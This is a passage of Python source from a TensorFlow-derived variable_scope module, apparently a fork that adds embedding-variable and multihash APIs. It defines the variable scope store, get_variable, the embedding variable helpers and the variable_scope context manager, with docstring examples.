class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.compat.v1.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(), name=stripped_var_name, trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.", "",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n", "", "GraphKeys.LOCAL_VARIABLES")
@tf_export(v1=["get_hash_table"])
def get_hash_table(name,
embedding_dim,
dtype=None,
initializer=None,
collections=None,
trainable=True,
synchronization=VariableSynchronization.AUTO,
partitioner=None,
children=None):
return get_variable_scope().get_hash_table(
_get_default_variable_store(),
name,
shape=embedding_dim,
dtype=dtype,
initializer=initializer,
collections=collections,
trainable=trainable,
synchronization=synchronization,
partitioner=partitioner,
children=children)
@tf_export(v1=["get_embedding_variable"])
def get_embedding_variable(name,
embedding_dim,
key_dtype=dtypes.int64,
value_dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
custom_getter=None,
constraint=None,
steps_to_live=None,
init_data_source=None,
ev_option = variables.EmbeddingVariableOption()):
if key_dtype == dtypes.int64:
invalid_key = 9223372036854775807
elif key_dtype == dtypes.int32:
invalid_key = -1
elif key_dtype == dtypes.string:
invalid_key = ""
else:
raise ValueError("Not support key_dtype: %s, only support int64/int32/string" % key_dtype)
l2_weight_threshold = -1.0
if initializer is None:
initializer = init_ops.truncated_normal_initializer()
if steps_to_live != None:
logging.warn("steps_to_live is deprecated,"
" use tf.GlobaStepEvcit(steps_to_live)")
if ev_option.evict != None:
if isinstance(ev_option.evict, variables.GlobalStepEvict):
if steps_to_live != None:
logging.warning("Warning: steps_to_live is double set, the steps_to_live in GlobalStepEvict is valid")
steps_to_live = ev_option.evict.steps_to_live
elif isinstance(ev_option.evict, variables.L2WeightEvict):
l2_weight_threshold = ev_option.evict.l2_weight_threshold
else:
l2_weight_threshold = -1.0
if steps_to_live != None and l2_weight_threshold > 0:
raise ValueError("step_to_live and l2_weight_threshold can't be enabled at same time.")
return get_variable_scope().get_embedding_variable(
_get_default_variable_store(), name, shape=embedding_dim, dtype=value_dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=True, custom_getter=custom_getter,
constraint=constraint, invalid_key=invalid_key,
evconfig=variables.EmbeddingVariableConfig(
steps_to_live=steps_to_live,init_data_source=init_data_source,ht_type=ev_option.ht_type,
l2_weight_threshold=l2_weight_threshold,
filter_strategy=ev_option.filter_strategy,
storage_type = ev_option.storage_option.storage_type),
ht_partition_num=ev_option.ht_partition_num)
#@tf_export(v1=["get_embedding_variable"])
def get_embedding_variable_internal(name,
embedding_dim,
key_dtype=dtypes.int64,
value_dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
custom_getter=None,
constraint=None,
steps_to_live=None,
init_data_source=None,
ev_option = variables.EmbeddingVariableOption()
):
if key_dtype == dtypes.int64:
invalid_key = 9223372036854775807
elif key_dtype == dtypes.int32:
invalid_key = -1
elif key_dtype == dtypes.string:
invalid_key = ""
else:
raise ValueError("Not support key_dtype: %s, only support int64/int32/string" % key_dtype)
l2_weight_threshold = -1.0
if initializer is None:
initializer = init_ops.truncated_normal_initializer()
if ev_option.evict != None:
if isinstance(ev_option.evict, variables.GlobalStepEvict):
if steps_to_live != None:
logging.warning("Warning: steps_to_live is double set, the steps_to_live in EvcitConfig is valid")
steps_to_live = ev_option.evict.steps_to_live
elif isinstance(ev_option.evict, variables.L2WeightEvict):
l2_weight_threshold = ev_option.evict.l2_weight_threshold
else:
l2_weight_threshold = -1.0
if steps_to_live != None and l2_weight_threshold > 0:
raise ValueError("step_to_live and l2_weight_threshold can't be enabled at same time.")
return get_variable_scope().get_embedding_variable(
_get_default_variable_store(), name, shape=embedding_dim, dtype=value_dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=True, custom_getter=custom_getter,
constraint=constraint, invalid_key=invalid_key,
evconfig=variables.EmbeddingVariableConfig(
steps_to_live=steps_to_live, init_data_source=init_data_source,
ht_type=ev_option.ht_type,
l2_weight_threshold=l2_weight_threshold,
filter_strategy=ev_option.filter_strategy,
storage_type=ev_option.storage_option.storage_type),
ht_partition_num=ev_option.ht_partition_num)
#@tf_export(v1=["get_embedding_variable_v2"])
def get_embedding_variable_v2_internal(name,
embedding_dim,
key_dtype=dtypes.int64,
value_dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
custom_getter=None,
constraint=None,
evconfig=variables.EmbeddingVariableConfig(),
ht_partition_num=1000):
if key_dtype == dtypes.int64:
invalid_key = 9223372036854775807
elif key_dtype == dtypes.int32:
invalid_key = -1
elif key_dtype == dtypes.string:
invalid_key = ""
else:
raise ValueError("Not support key_dtype: %s, only support int64/int32/string" % key_dtype)
if initializer is None:
initializer = init_ops.truncated_normal_initializer()
return get_variable_scope().get_embedding_variable(
_get_default_variable_store(), name, shape=embedding_dim, dtype=value_dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=True, custom_getter=custom_getter,
constraint=constraint, invalid_key=invalid_key,
evconfig=evconfig,
ht_partition_num=ht_partition_num)
@tf_export(v1=["get_multihash_variable"])
def get_multihash_variable(name,
dims,
complementary_strategy="Q-R",
operation="add",
dtype=float,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource = None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
strategy_list = ["Q-R"]
op_list = ["add", "mul", "concat"]
num_of_partitions = len(dims)
if complementary_strategy not in strategy_list:
raise ValueError("The strategy %s is not supported" % complementary_strategy)
if operation not in op_list:
raise ValueError("The operation %s is not supported" % operation)
if initializer is None:
initializer = init_ops.truncated_normal_initializer()
if complementary_strategy == 'Q-R':
if num_of_partitions != 2:
raise ValueError("the num_of_partitions must be 2 when using Q-R strategy.")
val_Q = get_variable_scope().get_variable(
_get_default_variable_store(), name +'/multhash_Q',
shape=dims[0], dtype=dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, custom_getter=custom_getter,
constraint=constraint,synchronization=synchronization,
aggregation=aggregation)
val_R = get_variable_scope().get_variable(
_get_default_variable_store(), name +'/multhash_R',
shape=dims[1], dtype=dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, custom_getter=custom_getter,
constraint=constraint,synchronization=synchronization,
aggregation=aggregation)
mhv = kv_variable_ops.MultiHashVariable(name, [val_Q, val_R],
variables.MultihashOption(num_of_partitions,
complementary_strategy,
operation,
dims))
return mhv
@tf_export(v1=["get_dynamic_dimension_embedding_variable"])
def get_dynamic_dimension_embedding_variable(name,
embedding_block_dimension,
embedding_block_num,
key_dtype=dtypes.int64,
value_dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
custom_getter=None,
constraint=None,
steps_to_live=None,
init_data_source=None,
ht_partition_num=1000,
storage_type=None):
if key_dtype == dtypes.int64:
invalid_key = 9223372036854775807
elif key_dtype == dtypes.int32:
invalid_key = -1
elif key_dtype == dtypes.string:
invalid_key = ""
else:
raise ValueError("Not support key_dtype: %s, only support int64/int32/string" % key_dtype)
if initializer is None:
initializer = init_ops.truncated_normal_initializer()
return get_variable_scope().get_dynamic_dimension_embedding_variable(
_get_default_variable_store(), name, shape=embedding_block_dimension,
embedding_block_num = embedding_block_num,
dtype=value_dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=True, custom_getter=custom_getter,
constraint=constraint, invalid_key=invalid_key,
evconfig=variables.EmbeddingVariableConfig(
steps_to_live=steps_to_live, init_data_source=init_data_source,
storage_type=storage_type),
ht_partition_num=ht_partition_num)
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to. Defaults
to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache on the
device where the Ops using the Variable reside, to deduplicate copying
through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a value
of unknown shape. If True, the default, the shape of initial_value must be
known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.compat.v1.AUTO_REUSE; if `None`, we inherit
the parent scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be creates instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
self._last_variable_scope_object = None
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" +
self._name_or_scope if self._old.name else self._name_or_scope)
self._reuse = (self._reuse or
self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
self._last_variable_scope_object = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
if (self._var_scope_store.current_scope is
not self._last_variable_scope_object):
raise RuntimeError("Improper nesting of variable_scope.")
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(functools.partial(old_getter, getter), *args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.compat.v1.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.compat.v1.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.compat.v1.variable_scope("foo", reuse=tf.compat.v1.AUTO_REUSE):
v = tf.compat.v1.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("foo", reuse=True):
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.compat.v1.variable_scope("foo") as scope:
v = tf.compat.v1.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
v1 = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.compat.v1.variable_scope("foo", reuse=True):
v = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scopes names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For e.g.
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
